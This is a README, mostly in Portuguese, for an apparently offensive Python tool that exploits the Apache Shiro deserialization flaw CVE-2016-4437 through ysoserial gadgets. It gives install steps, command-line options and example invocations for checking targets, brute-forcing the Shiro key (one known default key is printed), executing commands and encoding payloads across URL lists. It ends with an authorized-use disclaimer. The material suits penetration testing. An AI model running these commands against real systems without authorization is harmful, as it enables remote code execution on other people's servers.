
uma ferramenta de exploração rápida para a vulnerabilidade de desserialização do Shiro (CVE-2016-4437)/A simple tool targeted at shiro framework attacks with ysoserial.
Uma ferramenta de exploração rápida para a vulnerabilidade de desserialização do Shiro (CVE-2016-4437)
4nth0ny @Friday Lab
Aceitamos issues/pull requests
:)
python 3.x
JDK 1.8
python3 -m pip install -r requirements.txt
para AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' ou No module named 'Crypto'
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome
usage: shisoserial.py [-h] --mode MODE --url [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]
This is a simple tool to attack framework shiro with ysoserial
optional arguments:
-h, --help show this help message and exit
--mode MODE, -m MODE check/crack/yso/echo/encode
--url , -u Target URL address or the file containing the target URL
--type default:CBC, -t default:CBC
Cipher Type, GCM or CBC
--data , -d Using this parameter will make HTTP request with POST method
--key , -k Specify a Shiro Key or will use dictionary brute force cracking
--gadget , -g Specific Ysoserial Gadget
--command default:whoami, -c default:whoami
Specific Execute Command
--proxies , -p Specific Proxy
--ser , -s Specific serialize file name
--thread , -T Specific the number of threads
python3 shisoserial.py -m check -u http://127.0.0.1:8080

python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

Esta ferramenta deve ser usada apenas em atividades de segurança empresarial com autorização legal suficiente. Ao usar esta ferramenta, você deve garantir que todas as suas ações estejam em conformidade com as leis e regulamentos locais. Se você realizar qualquer ação ilegal ao usar esta ferramenta, assumirá todas as consequências. Todos os desenvolvedores e contribuidores desta ferramenta não assumem qualquer responsabilidade legal ou solidária. A menos que você tenha lido, compreendido completamente e aceitado todos os termos deste acordo, por favor, não instale nem use esta ferramenta. O seu uso ou qualquer outra forma de aceitação expressa ou implícita deste acordo será considerado como tendo lido e concordado com os termos deste acordo.